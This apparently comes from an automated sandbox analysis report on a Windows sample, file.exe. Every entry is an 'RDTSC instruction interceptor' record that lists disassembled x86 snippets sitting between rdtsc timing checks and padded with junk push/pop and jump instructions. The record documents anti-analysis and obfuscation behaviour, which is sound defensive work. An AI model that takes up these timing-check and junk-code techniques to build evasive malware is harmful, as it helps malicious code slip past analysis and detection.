                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E08FC second address: 54E096F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov cx, 572Bh 0x0000000f mov si, 3B07h 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FA22C516E3Fh 0x0000001f jmp 00007FA22C516E43h 0x00000024 popfd 0x00000025 pushfd 0x00000026 jmp 00007FA22C516E48h 0x0000002b jmp 00007FA22C516E45h 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E096F second address: 54E09B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA22C835FB7h 0x00000009 add esi, 407C8F3Eh 0x0000000f jmp 00007FA22C835FB9h 0x00000014 popfd 0x00000015 mov ch, 12h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E09B6 second address: 54E09CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E40h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E09CA second address: 54E09D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E09D0 second address: 54E09D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E02D8 second address: 54E02DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E02DC second address: 54E02E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E02E0 second address: 54E02E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E02E6 second address: 54E0301 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 mov si, C8F7h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f mov edx, ecx 0x00000011 mov bh, al 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E0301 second address: 54E0305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E0305 second address: 54E030B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E030B second address: 54E0311 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E0311 second address: 54E036B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FA22C516E45h 0x00000012 jmp 00007FA22C516E3Bh 0x00000017 popfd 0x00000018 pushfd 0x00000019 jmp 00007FA22C516E48h 0x0000001e add ecx, 5E8CA2D8h 0x00000024 jmp 00007FA22C516E3Bh 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E036B second address: 54E0371 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E0371 second address: 54E039B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA22C516E45h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E00C3 second address: 54E00F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C835FB2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b jmp 00007FA22C835FB0h 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E00F2 second address: 54E00F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E00F8 second address: 54E0132 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C835FAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007FA22C835FB2h 0x00000011 mov edi, esi 0x00000013 popad 0x00000014 mov cx, A5BDh 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov eax, edx 0x00000020 mov esi, edi 0x00000022 popad 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E0132 second address: 54E0138 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E0138 second address: 54E013C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E0F13 second address: 54E0FB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA22C516E47h 0x00000009 add ah, 0000001Eh 0x0000000c jmp 00007FA22C516E49h 0x00000011 popfd 0x00000012 mov cx, B3E7h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a jmp 00007FA22C516E3Ah 0x0000001f push eax 0x00000020 pushad 0x00000021 mov dx, A1C4h 0x00000025 popad 0x00000026 xchg eax, ebp 0x00000027 pushad 0x00000028 popad 0x00000029 mov ebp, esp 0x0000002b pushad 0x0000002c jmp 00007FA22C516E48h 0x00000031 call 00007FA22C516E42h 0x00000036 mov ch, 3Ch 0x00000038 pop edi 0x00000039 popad 0x0000003a pop ebp 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FA22C516E49h 0x00000042 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55001A1 second address: 55001A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55001A5 second address: 55001AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55001AB second address: 55001C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA22C835FB3h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55001C2 second address: 5500286 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FA22C516E45h 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 call 00007FA22C516E48h 0x00000016 movzx ecx, bx 0x00000019 pop edx 0x0000001a popad 0x0000001b mov eax, dword ptr [ebp+08h] 0x0000001e jmp 00007FA22C516E3Ah 0x00000023 and dword ptr [eax], 00000000h 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FA22C516E3Eh 0x0000002d sub eax, 4EC16378h 0x00000033 jmp 00007FA22C516E3Bh 0x00000038 popfd 0x00000039 mov edi, eax 0x0000003b popad 0x0000003c and dword ptr [eax+04h], 00000000h 0x00000040 jmp 00007FA22C516E42h 0x00000045 pop ebp 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 pushfd 0x0000004a jmp 00007FA22C516E3Dh 0x0000004f and ecx, 6D7ABEC6h 0x00000055 jmp 00007FA22C516E41h 0x0000005a popfd 0x0000005b jmp 00007FA22C516E40h 0x00000060 popad 0x00000061 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5500286 second address: 550028B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E01F0 second address: 54E01F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E01F4 second address: 54E01F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E01F8 second address: 54E01FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E01FE second address: 54E0203 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E0203 second address: 54E0234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FA22C516E40h 0x0000000a or eax, 09870FD8h 0x00000010 jmp 00007FA22C516E3Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E0234 second address: 54E0238 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E0238 second address: 54E023E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E023E second address: 54E0270 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C835FAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FA22C835FABh 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FA22C835FB5h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E0270 second address: 54E0280 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA22C516E3Ch 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E0280 second address: 54E029C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b jmp 00007FA22C835FADh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E029C second address: 54E02AD instructions: 0x00000000 rdtsc 0x00000002 mov bx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov cl, bh 0x0000000e mov dl, al 0x00000010 popad 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E02AD second address: 54E02BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA22C835FABh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F0D64 second address: 54F0DCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FA22C516E3Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FA22C516E41h 0x00000017 xor si, 4C36h 0x0000001c jmp 00007FA22C516E41h 0x00000021 popfd 0x00000022 mov cx, 3C27h 0x00000026 popad 0x00000027 xchg eax, ebp 0x00000028 jmp 00007FA22C516E3Ah 0x0000002d mov ebp, esp 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 mov di, DD70h 0x00000036 push ebx 0x00000037 pop esi 0x00000038 popad 0x00000039 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F0DCF second address: 54F0E15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA22C835FB7h 0x00000009 and cx, 16CEh 0x0000000e jmp 00007FA22C835FB9h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov di, 142Eh 0x0000001f popad 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5500008 second address: 550000E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5510EAA second address: 5510F11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C835FB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dx, cx 0x0000000c popad 0x0000000d mov eax, dword ptr [774365FCh] 0x00000012 jmp 00007FA22C835FB2h 0x00000017 test eax, eax 0x00000019 jmp 00007FA22C835FB0h 0x0000001e je 00007FA29E6D8A1Ah 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FA22C835FB7h 0x0000002b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5510F11 second address: 5510F3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, F9FAh 0x00000007 mov ebx, 3ABFBBC6h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov ecx, eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FA22C516E48h 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5510F3C second address: 5510F42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5510F42 second address: 5510F7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor eax, dword ptr [ebp+08h] 0x0000000b jmp 00007FA22C516E46h 0x00000010 and ecx, 1Fh 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FA22C516E47h 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5510F7F second address: 552001B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C835FB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ror eax, cl 0x0000000b pushad 0x0000000c mov esi, 406F58B3h 0x00000011 jmp 00007FA22C835FB8h 0x00000016 popad 0x00000017 leave 0x00000018 jmp 00007FA22C835FB0h 0x0000001d retn 0004h 0x00000020 nop 0x00000021 mov esi, eax 0x00000023 lea eax, dword ptr [ebp-08h] 0x00000026 xor esi, dword ptr [00AA2014h] 0x0000002c push eax 0x0000002d push eax 0x0000002e push eax 0x0000002f lea eax, dword ptr [ebp-10h] 0x00000032 push eax 0x00000033 call 00007FA2312F5FB6h 0x00000038 push FFFFFFFEh 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FA22C835FB7h 0x00000041 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 552001B second address: 552003B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 movsx ebx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov dx, 49EAh 0x00000013 call 00007FA22C516E3Bh 0x00000018 pop ecx 0x00000019 popad 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 552003B second address: 55200AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, ecx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ret 0x00000009 nop 0x0000000a push eax 0x0000000b call 00007FA2312F5FF3h 0x00000010 mov edi, edi 0x00000012 jmp 00007FA22C835FADh 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 jmp 00007FA22C835FACh 0x0000001e pushfd 0x0000001f jmp 00007FA22C835FB2h 0x00000024 jmp 00007FA22C835FB5h 0x00000029 popfd 0x0000002a popad 0x0000002b push eax 0x0000002c jmp 00007FA22C835FB1h 0x00000031 xchg eax, ebp 0x00000032 pushad 0x00000033 mov cl, DFh 0x00000035 mov dh, 4Bh 0x00000037 popad 0x00000038 mov ebp, esp 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55200AC second address: 55200B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55200B0 second address: 55200B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55200B4 second address: 55200BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D002C second address: 54D0042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA22C835FB1h 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D0042 second address: 54D008E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 jmp 00007FA22C516E43h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007FA22C516E49h 0x00000013 xchg eax, ebp 0x00000014 jmp 00007FA22C516E3Eh 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D008E second address: 54D00AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C835FB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D00AB second address: 54D00BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA22C516E3Ch 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D00BB second address: 54D00BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D00BF second address: 54D00F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and esp, FFFFFFF8h 0x0000000b jmp 00007FA22C516E47h 0x00000010 xchg eax, ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FA22C516E40h 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D00F6 second address: 54D00FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D00FA second address: 54D0100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D0100 second address: 54D0106 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D0106 second address: 54D01A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E48h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007FA22C516E41h 0x00000012 mov dh, al 0x00000014 popad 0x00000015 xchg eax, ecx 0x00000016 pushad 0x00000017 mov ebx, 208BA40Ch 0x0000001c popad 0x0000001d xchg eax, ebx 0x0000001e pushad 0x0000001f mov edx, ecx 0x00000021 push ecx 0x00000022 mov esi, edx 0x00000024 pop edx 0x00000025 popad 0x00000026 push eax 0x00000027 jmp 00007FA22C516E41h 0x0000002c xchg eax, ebx 0x0000002d pushad 0x0000002e pushad 0x0000002f mov ebx, eax 0x00000031 pushad 0x00000032 popad 0x00000033 popad 0x00000034 popad 0x00000035 mov ebx, dword ptr [ebp+10h] 0x00000038 pushad 0x00000039 mov edx, eax 0x0000003b jmp 00007FA22C516E48h 0x00000040 popad 0x00000041 xchg eax, esi 0x00000042 jmp 00007FA22C516E40h 0x00000047 push eax 0x00000048 jmp 00007FA22C516E3Bh 0x0000004d xchg eax, esi 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D01A9 second address: 54D01AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D01AD second address: 54D01C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E47h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D01C8 second address: 54D02CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA22C835FAFh 0x00000009 xor ecx, 258F1E3Eh 0x0000000f jmp 00007FA22C835FB9h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FA22C835FB0h 0x0000001b and si, 6338h 0x00000020 jmp 00007FA22C835FABh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 mov esi, dword ptr [ebp+08h] 0x0000002c pushad 0x0000002d movzx esi, dx 0x00000030 mov ax, bx 0x00000033 popad 0x00000034 push ebx 0x00000035 jmp 00007FA22C835FB8h 0x0000003a mov dword ptr [esp], edi 0x0000003d jmp 00007FA22C835FB0h 0x00000042 test esi, esi 0x00000044 pushad 0x00000045 mov dx, ax 0x00000048 pushfd 0x00000049 jmp 00007FA22C835FAAh 0x0000004e sub ax, 5F28h 0x00000053 jmp 00007FA22C835FABh 0x00000058 popfd 0x00000059 popad 0x0000005a je 00007FA29E714341h 0x00000060 jmp 00007FA22C835FB6h 0x00000065 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000006c pushad 0x0000006d push eax 0x0000006e push edx 0x0000006f pushfd 0x00000070 jmp 00007FA22C835FB8h 0x00000075 sub ecx, 1A8173E8h 0x0000007b jmp 00007FA22C835FABh 0x00000080 popfd 0x00000081 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D02CB second address: 54D02E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 je 00007FA29E3F518Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA22C516E3Bh 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D02E5 second address: 54D02EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D02EB second address: 54D02EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D02EF second address: 54D02F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D02F3 second address: 54D030A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [esi+44h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA22C516E3Ah 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D030A second address: 54D0310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D0310 second address: 54D0314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D0314 second address: 54D0318 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D0318 second address: 54D033B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or edx, dword ptr [ebp+0Ch] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA22C516E45h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D033B second address: 54D0362 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 4569C797h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushfd 0x0000000c jmp 00007FA22C835FAAh 0x00000011 xor si, 3B08h 0x00000016 jmp 00007FA22C835FABh 0x0000001b popfd 0x0000001c rdtsc
